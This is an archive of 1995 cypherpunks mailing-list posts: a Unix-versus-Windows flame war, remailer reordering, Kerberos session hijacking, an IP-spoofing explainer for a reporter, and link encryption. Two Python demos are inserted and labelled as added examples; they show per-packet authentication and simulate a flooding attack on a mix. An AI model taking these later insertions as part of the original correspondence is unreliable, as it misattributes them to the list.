minimum editor, notepad.  But a weird file system has been
patched on to support source control (Cleartools), and like
everything else in unix it sort of half works with the rest
of the system, so we have to use vi.  Even my unix guru
uses vi.  And why the hell do I need a unix guru in order
to do stuff that dim witted secretaries do easily and
routinely in DOS/Windows?

And try cut and paste anything except text in Sun's so
called GUI.

And try to cut and paste *big* amounts of text.

And try to fiddle with the background screen etc -- yes it
can be done, but it is vastly more difficult and arcane
than under Windows.


Learning this kind of garbage is exactly like learning Vi.

Vi occupies so much brain space that even though I hate and
loathe it, I find myself typing vi commands in editors that
I use vastly more than vi.

Exposure to vi has impaired my use of editors I used before
vi, editors that are immeasurably superior.

People who imagine that vi is a decent editor have suffered
brain damage due to exposure to grossly bad tools.  They
perceive it as easy to use because it has damaged them in
the same way as it has damaged me.

And why am I using Vi?  Well, if unix has lots of
wonderful tools available why are lots and lots of people
still using the world's most hated software?   Because
unless you want to live in EMACS, it is intolerably painful
to escape from the clutches of this thoroughly evil editor.
Sure MIS *could* set it up so no one need be exposed to the
evils of vi.  But they do not. 

Those who imagine that unix is easy to use are suffering
from a similar form of brain damage, similar to that
caused by vi, but a broader and more serious form.

When people talked about teaching secretaries latex, did
not you realize they were having a dig at unix?  If you
did not pick that one up, it shows that unix has already
caused extensive brain damage.  You must stop your unix
habit right now before it is too late.


 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Thu, 26 Jan 95 16:28:31 PST
To: Michael Handler <cypherpunks@toad.com>
Subject: Re: Reordering, not Latency (Was: Re: Remailer)
Message-ID: <9501270019.AB24366@eri>
MIME-Version: 1.0
Content-Type: text/plain


At 09:10 PM 1/25/95, Michael Handler wrote:
> ... I have literally hundreds of messages archived from the CP list of
>several months back where Eric Hughes repeatedly states that reordering,
>not latency, is the key. Reordering of a sufficient magnitude will
>introduce latency inherently. Otherwise you are still vulnerable to 
>traffic analysis (which is an art, not a science, remember).

The headache with reordering of that sort is that you can't reply to a 
message until you've seen the message you're replying to.  There's a certain 
level of ordering that can't be changed.

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 26 Jan 95 16:23:19 PST
To: Marc Horowitz <marc@cam.ov.com>
Subject: Re: CERT statement
In-Reply-To: <9501270011.AA07672@dun-dun-noodles.cam.ov.com>
Message-ID: <9501270023.AA17883@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Marc Horowitz says:
> >> Kerberos per se isn't sufficient to defend against session hijacking
> >> attacks, you know. The situation in question is really insidious and
> >> requires packet-by-packet cryptographic authentication.
> 
> No, but kerberos or something like it is necessary.

Well, sort of. A key management system that operates sort of like
Kerberos' is necessary. However, that's really far from
sufficient. Most Kerberized protocols authenticate only at the
beginning of the session -- very very hijackable.

> And I think I can safely say that anything which really defends
> against TCP sequence spoofing or hijacking attacks will be more
> invasive and require more effort than kerberos, not less.

Oh, hardly the case -- in fact in the architecture of the system I'm
developing things are actually slightly easier than in the kerberos
situation. Invasive I'll agree with -- encrypted/authenticated IP
requires kernel mods. However, they can be made fairly painless.

I'll point out, by the way, that one of the major problems with
kerberos is just bad documentation and difficult build tools.

Perry
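
The difference between authenticating only at session start and authenticating every packet, as an added example (not code from this thread or from Kerberos). HMAC-SHA256, the class names and the constructed session key are assumptions; the key is taken to come from a Kerberos-like key management exchange that is not shown.

```python
import hashlib
import hmac
import struct

TAG_LEN = hashlib.sha256().digest_size  # 32-byte authentication tag


class LoginOnlyReceiver:
    """Checks a proof of the session key once, then trusts the connection."""

    def __init__(self, session_key: bytes):
        self._key = session_key
        self._authenticated = False
        self.delivered = []

    def login(self, proof: bytes) -> bool:
        expected = hmac.new(self._key, b"login", hashlib.sha256).digest()
        self._authenticated = hmac.compare_digest(proof, expected)
        return self._authenticated

    def receive(self, payload: bytes) -> bool:
        # After login nothing ties a payload to the key holder, so anything
        # arriving on the established connection is delivered.
        if not self._authenticated:
            return False
        self.delivered.append(payload)
        return True


def seal(session_key: bytes, seq: int, payload: bytes) -> bytes:
    """Packet = 8-byte sequence number + payload + HMAC over both."""
    header = struct.pack(">Q", seq)
    tag = hmac.new(session_key, header + payload, hashlib.sha256).digest()
    return header + payload + tag


class PerPacketReceiver:
    """Verifies a keyed tag and the expected sequence number on every packet."""

    def __init__(self, session_key: bytes):
        self._key = session_key
        self._next_seq = 0
        self.delivered = []

    def receive(self, packet: bytes) -> bool:
        if len(packet) < 8 + TAG_LEN:
            return False
        header, payload, tag = packet[:8], packet[8:-TAG_LEN], packet[-TAG_LEN:]
        expected = hmac.new(self._key, header + payload, hashlib.sha256).digest()
        if not hmac.compare_digest(tag, expected):
            return False  # sender does not hold the session key, or data altered
        (seq,) = struct.unpack(">Q", header)
        if seq != self._next_seq:
            return False  # replayed or out-of-order packet (strict ordering assumed)
        self._next_seq += 1
        self.delivered.append(payload)
        return True


def demo() -> dict:
    key = b"constructed-session-key-for-demo"  # constructed sample value

    weak = LoginOnlyReceiver(key)
    weak.login(hmac.new(key, b"login", hashlib.sha256).digest())
    weak.receive(b"ls")
    # A third party who takes over the connection needs no key from here on.
    injected_into_weak = weak.receive(b"INJECTED-BY-THIRD-PARTY")

    strong = PerPacketReceiver(key)
    first = seal(key, 0, b"ls")
    legit_ok = strong.receive(first)
    forged = struct.pack(">Q", 1) + b"INJECTED-BY-THIRD-PARTY" + bytes(TAG_LEN)
    tampered = bytearray(seal(key, 1, b"cat notes"))
    tampered[8] ^= 0x01  # flip one payload bit in transit

    return {
        "login_only_accepts_injection": injected_into_weak,
        "legit_accepted": legit_ok,
        "forged_rejected": not strong.receive(forged),
        "replay_rejected": not strong.receive(first),
        "tampered_rejected": not strong.receive(bytes(tampered)),
        "next_legit_accepted": strong.receive(seal(key, 1, b"cat notes")),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```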




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com
Date: Thu, 26 Jan 95 19:28:43 PST
To: grendel@netaxs.com
Subject: Re:  Reordering, not Latency (Was: Re: Remailer)
Message-ID: <9501270326.AA08959@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


> > In recent discussions, the consensus 
> > was that message reordering was superior to (and the actual intent of) 
> > latency.  Reordering is not sufficient, a form of latency is required 
> > to make it effective.
> 	I have literally hundreds of messages archived from the CP list of
> several months back where Eric Hughes repeatedly states that reordering,
> not latency, is the key. Reordering of a sufficient magnitude will
> introduce latency inherently. 

Effective reordering is the key - as Louis Cypher's article showed,
there are forms of reordering which are NOT effective, though the requirement
for latency is really a consequence rather than a direct requirement.
There are six+ classes of packets that can go through a remailer:
1) Real packets from outside to be remailed to outside.
2) Hostile packets from traffic analysts* outside to outside.
3) Real packets from outside to users on the remailer itself.
4) Real packets from the remailer itself to outside.
5) Cover traffic packets from the remailer to outside.
6) Cover packets from outside friendly remailers.

Ignoring categories 3-6 for the moment, the problem with reordering
is that the remailer needs to reorder n _real_ packets to get a certain
level of security, but can't really tell real packets from hostile ones.
If the algorithm is simply to reorder and retransmit batches of n packets,
either en masse or in a stream basis as Louis suggests, 
the analysts can surround each real packet with n hostile packets
from known destinations to known destinations and therefore be able
to pick out the one real packet on the outbound.
The effect of latency L is to provide a reasonable probability that
n real packets will have arrived during time L, so the addition
of hostile packets does not prevent the mixing between the n real packets.

Outbound cover traffic is helpful, but unless it targets the same
destinations as the real traffic with some probability,
it may not be sufficient to prevent long-term pattern analysis
(and cover traffic is mainly useful when sent to other remailers
and their co-conspirators; cover traffic sent to a newsgroup
or innocent member of the public is generally recognizable as such...)
Inbound cover traffic is great, of course - I'm not sure if it
totally substitutes for real traffic?  Its best use is in systems
where real traffic users chain between remailers which also carry
cover traffic between them, but there's still some information that
can potentially be gleaned about a small** remailer-cloud viewed as a whole
by analysts forcing lots of traffic through the cloud, unless the
remailers implement adequate reordering models.

[* I was going to refer to traffic analysts by the usual term Bad Guys,
but someday one of us good guys may want to break into a net
run by Bad Guys, so I decided to stay neutral here :-)]

[** The current 15-20 remailers are still a relatively small cloud.]

		Bill
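
The batch-versus-latency argument above, as an added simulation (not code from this thread or from any remailer). It measures how many real packets share each outgoing batch. The batch size n=5, the 10-second spacing of real packets, the 60-second window and all names are constructed assumptions; the `real` flag is ground truth visible only to the simulation, never to the remailer.

```python
import random
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    arrival: float  # seconds since start
    real: bool      # True for class 1 traffic, False for class 2 (flood)


def build_traffic(n_real: int, spacing: float, flood_per_real: int) -> list:
    """One real packet every `spacing` seconds, each followed by a flood burst."""
    packets = []
    for i in range(n_real):
        t = i * spacing
        packets.append(Packet(t, True))
        for j in range(flood_per_real):
            packets.append(Packet(t + 0.001 * (j + 1), False))
    return packets


def threshold_mix(packets: list, n: int, rng: random.Random) -> list:
    """Reorder and send as soon as n packets are queued (no latency rule)."""
    batches, pool = [], []
    for p in sorted(packets, key=lambda p: p.arrival):
        pool.append(p)
        if len(pool) == n:
            rng.shuffle(pool)
            batches.append(pool)
            pool = []
    return batches  # a partial final batch stays queued


def timed_mix(packets: list, window: float, rng: random.Random) -> list:
    """Hold everything for a window of length L, then reorder and send."""
    buckets = {}
    for p in packets:
        buckets.setdefault(int(p.arrival // window), []).append(p)
    batches = []
    for k in sorted(buckets):
        batch = buckets[k]
        rng.shuffle(batch)
        batches.append(batch)
    return batches


def anonymity_sets(batches: list) -> list:
    """Real packets per batch: the crowd each real packet actually hides in."""
    return [sum(p.real for p in b) for b in batches if any(p.real for p in b)]


def compare(n: int = 5, window: float = 60.0, seed: int = 1995) -> dict:
    rng = random.Random(seed)
    quiet = build_traffic(12, 10.0, 0)
    # n - 1 flood packets per real packet fill each n-packet batch exactly.
    flooded = build_traffic(12, 10.0, n - 1)
    return {
        "threshold_quiet": anonymity_sets(threshold_mix(quiet, n, rng)),
        "threshold_flooded": anonymity_sets(threshold_mix(flooded, n, rng)),
        "timed_quiet": anonymity_sets(timed_mix(quiet, window, rng)),
        "timed_flooded": anonymity_sets(timed_mix(flooded, window, rng)),
    }


if __name__ == "__main__":
    for name, sets in compare().items():
        print(f"{name}: {sets}")
```

Under flooding every threshold batch holds exactly one real packet, while the timed mix keeps six real packets per batch because its crowd depends on how many real packets arrive during L, not on the total count.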




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Thu, 26 Jan 95 16:38:08 PST
To: cypherpunks@toad.com
Subject: Take the Unix Jihad elsewhere, please
In-Reply-To: <9501262358.AA16253@poe.digibd.com>
Message-ID: <199501270039.TAA21961@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Bill O'Hanlon writes:
> James A. Donald wrote:
> > Perry E. Metzger wrote:
> > > Unix is perfectly easy to use. It's no worse than DOS.
> > Thanks for the entertainment Perry.
> I had agreed with Perry's statement when I saw it.

Could we please _not_ engage in Yet Another O/S Jihad here ?

I doubt anyone will ever convince Perry and James to stop flaming each other
incessantly in public, but we don't need to fan the flames.

Thank you.

 -L. McCarthy



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew J Ghio <mg5n+@andrew.cmu.edu>
Date: Thu, 26 Jan 95 17:05:46 PST
To: sorr@eznet.net (Steve Orr)
Subject: Re: Identity
In-Reply-To: <199501251909.OAA26291@roch0.eznet.net>
Message-ID: <4j_4OPa00VIE87sYtV@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Steve Orr <sorr@eznet.net> wrote:

> To whomever:
>   I'm a reporter at the daily newspapers in Rochester, N.Y., researching a
> story on the recent spate of IP-spoof hack events. Supposedly a toad.com
> address was used by a person who broke into the San Diego
> supercomputer center a month ago. What's toad.com? I got your name
> from a web search that found an old communique.
>   Can you be any help? I'm simply trying to reconstruct what happened.
> Steve Orr
> Gannett Rochester Newspapers


To Mr. Orr:

It appears that someone has decided to anonymously make rude comments in
reply to your message, instead of answering the questions.  This is
unfortunate, but not surprising (to me, at least).  Recently there have
been several articles in popular newspapers and magazines, which were
poorly researched and presented horribly inaccurate and misleading
information about the Internet.  Some of these were incredibly biased,
and in a few cases were defamatory and made very unfavorable statements
about people who are well-respected on the Internet.  This has
understandably created an intense hostility toward the popular media in
general.  Reporters who are new to the network will undoubtedly
encounter this hostility and mistrust.  Unfortunately, this animosity is
a self-perpetuating process.  While I share the anonymous poster's
frustration, I must denounce his manner of showing it, for it only
serves to exacerbate the problem.

Judging by your reference to an old communique found in a web search,
you seem not to know the ultimate destination of the address you have
written to (cypherpunks@toad.com).  This is a broadcast address which
relays messages to a group of about 700 people.  It is a forum for
discussing privacy and security on the internet, and the use of
cryptography to achieve those goals.

However, I will attempt to answer your query with a general explanation
of what an "IP Spoofing" attack is.  Computers on the internet use a
standard method of communicating known as the Internet Protocol.  Data
to be transmitted is placed into a form known as a packet.  A packet is
like a letter dropped into a mailbox to be sent on its way.  It has a to
address, a return address and a message.  The packet is sent from your
computer to another computer known as a router.  The router looks at the
address on the packet, decides which direction it should go, and
retransmits the packet over a wire to another router.  Each router will
re-send the packet to the next one as the packet makes its way through
the network, until it ultimately reaches its final destination.

IP spoofing is, simply put, placing a fake return address on a packet,
and pretending to be an authorized user on a computer system that you are
not really on.  This is, basically, a high tech version of an old
mail-fraud system:  Suppose you sent a letter to a corporation
purporting to be one of their major suppliers.  In it you indicate that
you have a shipment ready, and ask if they are interested in purchasing
it.  Having knowledge about what their usual response might be, you
anticipate a positive reply and send another letter thanking them for
their interest, and giving instructions for where to send the money. 
Now, the real supplier actually gets their responses back - you're just
blindly guessing what those responses will be - but by the time they
figure it out, you've made off with their money.   IP spoofing is the
same - someone can send IP data packets purporting to be from someone
else, guess the responses, and act accordingly.  Sometimes they will
guess wrong and fail.  But if they try it enough, they'll find someone,
or more likely some program, that'll fall for it, letting them have
unauthorized access to the target computer.

I hope that answers your questions.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@com.informix.com
Date: Thu, 26 Jan 95 20:05:20 PST
Subject: Even more unix holy war. Was "Clinton freezes U.S. assets .."
Message-ID: <9501270405.AA01448@carbon.informix.com>
MIME-Version: 1.0
Content-Type: text/plain


To summarize this thread, and I hope end it.

The fans of unix correctly point out that unix can,
in principle, be configured to be really nice.

Well so can a molten lump of pig iron, in principle,
be configured to be something really nice.

Out in the real world people do not like dealing with
a molten lump of pig iron, and so it is usually not
configured to be really nice, which is why we see
people editing with vi and publishing with latex.

Now sometimes MIS creates a tiny little reserve where 
things really are really nice, and the secretaries are 
herded into this little reserve, and within this little 
reserve everything is almost as nice as windows.
(Unless of course you want to cut and paste formatted 
text and graphics between windows, under the sun OS, but hey,
that is an arcane operation that the normal user would
never want to do.  Right?  You cannot really expect MIS
to help such special power users can you?)
 
And that is what Bill O'Hanlon meant when he said that for ordinary 
naive users who had not been exposed to either operating system, unix 
was no worse than dos.  Herd them into the reserve and keep
them there, and it is indeed no worse than dos.

But the reserve is not really the whole operating system, it
is just a little area of safety.  And as soon as somebody
strolls outside the little reserve to do something that MIS
has not specifically planned for and arranged, half a ton of 
molten pig iron pours down on them, and MIS says:  "Hey, don't
do that."

 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Thu, 26 Jan 95 20:43:22 PST
To: cypherpunks@toad.com
Subject: Re: Reordering, not Latency (Was: Re: Remailer)
In-Reply-To: <9501261922.AA07092@ch1d157nwk>
Message-ID: <199501270442.UAA25311@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>

   Is this even technically possible?  That is, wholesale monitoring of  
   disparate portions of the net from a single access point.  

If I were doing global Internet monitoring, I wouldn't be doing it
in-band.  Too much cooperation by the vendors required; too much
discovery.  Rather, I'd gain access to the trunks directly and do my
own demodulation and decoding.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@com.informix.com
Date: Thu, 26 Jan 95 20:59:43 PST
Subject: Even more unix holy war. Was "Clinton freezes U.S. assets .."
Message-ID: <9501270500.AA00284@carbon.informix.com>
MIME-Version: 1.0
Content-Type: text/plain


I am writing this under sun's unix imitation of Microsoft's
and Apple's GUI.  I am using their almost acceptable ASCII editor.

I leave a window open for a long time.

Then I attempt to close down the window, an operation that I can
do in Microsoft Windows with a single double click.  In unix 
I click on the border to bring up a popup menu, carefully drag 
to the right point on the menu, then release.  In addition 
the menu names are confusing.  If you want to minimize a 
window you have to "close" it.  If you want to cause a window 
to cease to be, you have to "quit" it -- Hey did I not already 
quit it when I forgot about it and went to do something else.


A warning message comes up:  I have not saved.  I am offered the 
options of quitting or not quitting.

Gee guys, did it never occur to the great unix gurus that at 
this point the option that the user most likely wants to do 
is save the file.  How come the number one most common option
is not in the message box.

A thought strikes me.  I have set up Microsoft windows 
with a little icon that allows me to reboot or close down 
windows with a single double click.

What will happen if I attempt to reboot unix.  Well the answer
is obvious, seeing as unix is made of broken glass with sharp
edges everywhere, working on the principle of "You asked for
it sucker, you got it, Ha Ha, massive data loss to prove you
are no good at unix."

So I go to a terminal emulation box  (Notice how under unix
windows the number one running app is terminal emulator, whereas
in Microsoft windows people use Windows applications.)

I make myself root, and enter my root password.  I type sync
three times, and then type reboot. And lo, unix reboots.

Note that this is substantially more work than double clicking
on an icon.  Note also that rebooting takes *much* longer than
with DOS/Windows.

And, as can be predicted from unix basic operating philosophy
(Cut the stupid user's throat if you can) my open edit windows
are cut down *without* any message boxes popping up giving
me the option of saving this file before the reboot proceeds.

Eventually, at long, long, long, long, long, last, Unix
deigns to come back and give me some windows.

Naturally the test edits that I did just before rebooting are
lost, as I expected from the basic unix 
cut-the-stupid-suckers-throat philosophy.  

What I did not expect is that one of the files I *did* want (and
saved immediately before rebooting), has not only not kept the
changes I made -- the file has completely DISAPPEARED! -- Too
bad sucker -- that will teach me -- maybe next time I will type
six sync commands before rebooting as a sacrifice to the great
God unix in the vain hope that it will spare my data.

Or perhaps no number of sync commands could make a difference
because some network hiccup postponed the file save, (I was saving
to a network drive) so that the file only *appeared* to be saved,
but was in reality somewhere on my machine, or somewhere on the
network, in unsynced limbo, and my privileges are not such that
I can sync the network.  Or perhaps it is just another of the
many profound mysteries of unix that enable unix gurus to make
a living.

 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@com.informix.com
Date: Thu, 26 Jan 95 21:04:40 PST
Subject: Even more unix holy war. Was "Clinton freezes U.S. assets .."
Message-ID: <9501270505.AA00287@carbon.informix.com>
MIME-Version: 1.0
Content-Type: text/plain


And did I mention that "make" used to treat a tab as semantically
different from a space, so that a tab with an invisible space
in front of it would result in the makefile failing.

Oh yes, I did mention that.

Well I guess I will mention it again.

 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@com.informix.com
Date: Thu, 26 Jan 95 21:12:01 PST
Subject: Even more unix holy war. Was "Clinton freezes U.S. assets .."
Message-ID: <9501270512.AA00309@carbon.informix.com>
MIME-Version: 1.0
Content-Type: text/plain


And did I mention that in DOS you can type 
   rename *.txt *.asc
to turn all *.txt files into the corresponding *.asc file

but that if in unix you type
   mv *.txt *.asc
not only will it not rename your *.txt files to be *.asc files, but
if you have only two *.txt files it will silently destroy the
second and issue no warning that anything has gone amiss.

Hell, it is only the users data -- stupid user, he can type
it in again.

And of course I have already mentioned the unix "make" utility.

 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@com.informix.com
Date: Thu, 26 Jan 95 21:38:06 PST
Subject: Even more unix holy war. Was "Clinton freezes U.S. assets .."
Message-ID: <9501270538.AA00359@carbon.informix.com>
MIME-Version: 1.0
Content-Type: text/plain


And did I mention that in DOS you can type:
   dir filename /s
if you suspect that filename is in a subdirectory somewhere
and you want the computer to find it for you, 

but in unix you type:
   find . -name filename -print

but the entertaining thing is that if you type
   find . -name filename

find then merrily goes forth, searches for the file -- which
takes an extraordinarily long time, much longer than on
my DOS machine, and then, cheerfully throws away what it
has found, no warnings, no error message, no explanation.

find thinks to itself "Gee, the user asked me to find the 
file, but he did not tell me to do anything with the
information, so, I guess he just wanted me to exercise
the network and the hard drive for five minutes or so."

And did I mention "curses"

You are spared.  I will not mention "curses".

And did I mention SUID.

Well fortunately SUID has already been mentioned 
by other folk in the "Clinton freezes .." thread.

And did I mention that unix has no less than seven families
of metasyntactic operators, each of them different from 
and clashing with the others, that these families follow
no logical order of substitution that I can figure out.

Yeah, I know, that is what makes the unix shell so powerful.

It is remarkably similar to what makes a chainsaw so powerful.

It is very good at cutting your fingers off.

And once again, I wish to remind you that the unix "make"
utility used to treat spaces as semantically different
from tabs.


 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: doumakes@netcom.com (Don Doumakes)
Date: Thu, 26 Jan 95 21:07:00 PST
To: cypherpunks@toad.com
Subject: Re: LOCKSMITH'S GUILD WANTS L
Message-ID: <199501270505.VAA13738@netcom16.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

"James A. Donald" <jamesd@netcom.com> wrote:

> This assumes that governments have the necessary wisdom to tell a bad
> architect from a good architect.   This does not seem very plausible.
>
> [snip]
>
> While universities often issue or refrain from issuing certificates for
> corrupt and improper reasons, government supervision on this matter is
> unlikely to keep them honest

I think you misunderstand the licensing process.  The standards for a
profession are set by the profession itself.  They decide what is an
adequate curriculum, for example, and what is an adequate amount of
continuing education.  They literally write the questions for the
licensing exam.

They also privately accredit the schools, which is more than adequate to
"keep them honest."

Then the government administers the exam and issues licenses.  The
professional associations could do this themselves, making it an
entirely private affair, but there remains one function that only
government can exert:  the government forbids someone without a license
from functioning as a professional.

In other words, licensing isn't a process of government interference in
professions.  It's a process of professions seeking governmental
imprimatur for their own credentialing process, arguably in the public
interest.

(YMMV; there may be exceptional professions that just hated the whole
idea and were dragged into it kicking and screaming, of which I am
unaware.)

ObCrypto:  It's certainly true that crypto will make it easier to
function as a professional without having the credentials.  "On the
Internet, nobody knows you're a quack."  I just see it as something to
endure, rather than something to applaud.


______________________________________________________________________
Don Doumakes             Finger doumakes@netcom.com for PGP public key

Foxpro databases built to your specifications.  Email me for details.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLygTahtumcu2AjihAQEb7AP8DRfcZJvLZy8mw7jg6wjrjHeNl1IbP5EW
h3en/84ENKB2SbmcIXx7TtEl3jGz6bZ2T7JA7Ed3UYC78lq8/QsTgBW41Sh+arbX
/j1o6Sot6jYAs5EGiuiD4OoxhRopDMuoZFt9NyRJfTF68jHP1olsjiLwnV0mq3g4
nRUh71wnFmk=
=EjEG
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joshua geller <joshua@alkahest.retix.com>
Date: Thu, 26 Jan 95 22:01:54 PST
To: jamesd@com.informix.com
Subject: Re: Even more unix holy war. Was "Clinton freezes U.S. assets .."
In-Reply-To: <9501270538.AA00359@carbon.informix.com>
Message-ID: <199501270601.WAA02306@alkahest.isas.com>
MIME-Version: 1.0
Content-Type: text/plain



>   And did I mention that in DOS you can type:
>   [....]

>   but in unix you type:
>   [....]

ya know, there are mailing lists for people who hate unix.

this isn't one of them.

josh

___

The Zen of UNIX

  "Unix teaches us about the transitory nature of all things, thus
   ridding us of samsaric attachments and hastening enlightenment.  For
   instance, while trying to make sense of an X initialization script
   someone had given me, I came across a line that looked like an
   ordinary unix shell command with the term "exec" prefaced to it.
   Curious as to what exec might do, I typed "exec ls" to a shell window.
   It listed a directory, then proceeded to kill the shell and every
   other window I had, leaving the screen almost totally black with a
   tiny white inactive cursor hanging at the bottom to remind me that
   nothing is absolute and all things partake of their opposite.

  "In the past I might have gotten upset or angry at such an occurrence.
   That was before I found enlightenment through Unix.  Now, I no longer
   have attachments to my processes.  Both processes and the disappearance
   of processes are illusory.  The world is unix, unix is the world,
   labor ceaselessly for the salvation of all sentient beings."
   -Michael Travers





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jaeson.M.Engle@josaiah.sewanee.edu (Rhys Kyraden)
Date: Thu, 26 Jan 95 20:18:04 PST
To: rkmoore@iol.ie (Richard K. Moore)
Subject: Re: white noise remailer
Message-ID: <v01510108ab4e1543cd18@[152.97.12.101]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

This is an interesting approach. It could even contain a small set of PGP'd
messages like "This is the sound of white noise on the Internet" and
"Have fun breaking this one?" In the event someone took the time
to break the pgp...

>I'm new to all this so please pardon my ignorance, but are you guys
>considering the following approach:
>
>The remailer transmits a constant bandwidth of outgoing messages of all
>about the same size to a uniformly distributed range of target addresses.
>Incoming messages are randomly dispersed within this stream, packed out to
>the standard size.
>
>-rkm
>
>
>---
>
>Richard K. Moore - rkmoore@iol.ie - Wexford, Ireland - fax +353 53 23970

-----BEGIN PGP SIGNATURE-----
Version: 2.6ui

iQCVAgUBLyhlIUiLvmPjc4XdAQFRgwQAiSJr09cQav2c+kqz+6a8NSyh4BXf1prx
0hDbn31MlBBWTnezk/+PSCmfE9eXZwLbrLDCtUwIoudhIYxTqAzJV10GK0gWyF7O
6iKg6LTEgsa4DfJC2uc7Knrdj9ln9LK6qy8/I5zM5QZdfZHwYEuEcGS5aPIHdYGT
SbKsnUi0rHI=
=kUQl
-----END PGP SIGNATURE-----

                                             aka:
(-: Jaeson M. Engle    ||    jme@josaiah.sewanee.edu :-)
(-:      www server: http://josaiah.sewanee.edu/         :-)
(-: It's February 8th! IT'S TIME!!! Ask me for details!:-)
(-: Finger 'jme@josaiah.sewanee.edu' for my Public :-)
                                        PGP block.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@com.informix.com
Date: Thu, 26 Jan 95 22:28:44 PST
Subject: Even more unix holy war. Was "Clinton freezes U.S. assets .."
Message-ID: <9501270629.AA00372@carbon.informix.com>
MIME-Version: 1.0
Content-Type: text/plain


And another vast advantage of DOS Windows is that it is 
a vastly better environment for developing software than unix.

The great strength is of course symbolic debugging -- you can
single step your compiled code, and see it displayed symbolically,
with the symbols and statements of your source code, whilst
unix programmers are usually reduced to picking through core 
dumps like grave robbers.

You can run your program under the debugger and set it so that
when an exception condition occurs, bingo you are in the debugger
at the line where the exception occurred, and all the variables
as they were when the exception occurred, and the rest of windows,
the graphical user interface, has been frozen until you examine 
the situation to your satisfaction.

Try that in Unix.

You might be able to do a crude and limited equivalent with 
a text mode program, but with a GUI program you are hosed.

This is the basic reason why unix software sucks -- because the
tools for writing it suck.

And every unix programmer gets to roll his own user interface,
which means that every programmer has to figure out how to 
roll his own user interface and every programmer does it 
differently.

And windows has the *.rc file system for internationalization.

A simple and powerful method for putting everything that needs
to be translated in one set of files, and nothing that needs to
be translated in the other set.  Unix has no equivalent.  So 
every company that needs to internationalize its product hand
rolls their own ragged equivalent to windows *.rc and *.res
files, but it cannot be the same because they never hand roll
the tools for manipulating and using *.rc and *.res files.

Windows has power tools for dealing with this problem.  Unix
does not.  And the power tools that unix does possess not only
do not adequately address this problem, they are also likely
to cut your hands off.


 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wei Dai" <weidai@eskimo.com>
Date: Fri, 27 Jan 95 00:00:01 PST
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: link encryption and anonymous interactivity (Was: "Subway" remai
Message-ID: <199501270759.AA23031@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Adam Shostack writes:

> 	The idea is a very good one, it's usually called "link
> encryption."  The idea is to make it difficult to tell when someone is
> using a line by filling that line with random noise that looks like
> encrypted data.

